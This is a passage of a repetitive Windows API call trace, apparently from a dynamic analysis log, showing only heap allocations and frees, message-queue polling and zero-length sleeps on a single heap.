dwFlags=0x0, lpMem=0xdffe20 | out: hHeap=0xb80000) returned 1 [0268.692] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf760 [0268.692] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0e0 [0268.692] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe20 [0268.692] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0c8 [0268.692] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.692] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.692] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.692] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.692] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.692] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.692] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.692] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.692] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.693] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.693] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.693] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.693] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.693] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.693] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.693] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.693] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.693] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.693] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.693] Sleep (dwMilliseconds=0x0) [0268.702] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.702] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.702] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.702] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.702] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.702] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.703] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.703] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.703] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.703] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.703] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.703] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.703] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.703] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.703] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.703] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.703] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.703] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.703] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.703] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.703] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.703] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.703] Sleep (dwMilliseconds=0x0) [0268.703] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.703] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.703] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.703] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.703] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.703] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.703] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.704] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.704] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.704] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.704] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.706] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.706] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.706] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.706] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.706] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.706] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.706] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.706] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.706] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.706] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.706] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.706] Sleep (dwMilliseconds=0x0) [0268.706] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.706] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.706] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.706] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.706] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.706] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.707] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.707] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.707] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.707] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.707] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.707] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.707] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.707] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.707] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.707] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.707] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.707] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.707] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.707] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.707] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.707] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.707] Sleep (dwMilliseconds=0x0) [0268.707] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.707] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.707] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.707] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.707] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.707] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.707] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.708] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.708] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.708] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.708] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.708] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.708] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.708] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.708] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.708] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.708] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.708] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.708] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.708] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.708] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.708] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.708] Sleep (dwMilliseconds=0x0) [0268.708] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.708] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.708] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.708] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.708] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.708] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.708] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.709] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.709] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.709] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.709] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.709] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.709] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.709] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.709] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.709] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.709] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.709] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.709] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.709] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.709] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.709] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.709] Sleep (dwMilliseconds=0x0) [0268.709] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.709] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.709] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.709] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.709] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.709] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.709] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.710] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.710] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.710] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.710] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.710] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.710] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.710] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.710] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.710] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.710] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.710] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.710] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.710] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.710] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.710] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.710] Sleep (dwMilliseconds=0x0) [0268.710] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.710] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.710] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.710] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.710] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.710] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.710] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.711] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.711] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.711] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.711] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.711] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.711] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.711] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.711] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.711] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.711] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.711] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.711] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.711] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.711] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.711] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.711] Sleep (dwMilliseconds=0x0) [0268.711] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.711] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.711] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.711] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.711] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.711] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.711] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.711] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.711] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.712] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.712] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.712] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.712] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.712] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.712] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.712] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.712] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.712] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.712] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.712] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.712] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.712] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.712] Sleep (dwMilliseconds=0x0) [0268.712] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.712] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.712] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.712] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.712] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.712] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.712] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.712] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.712] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.712] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.713] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.713] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.713] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.713] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.713] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.713] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.713] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.713] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.713] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 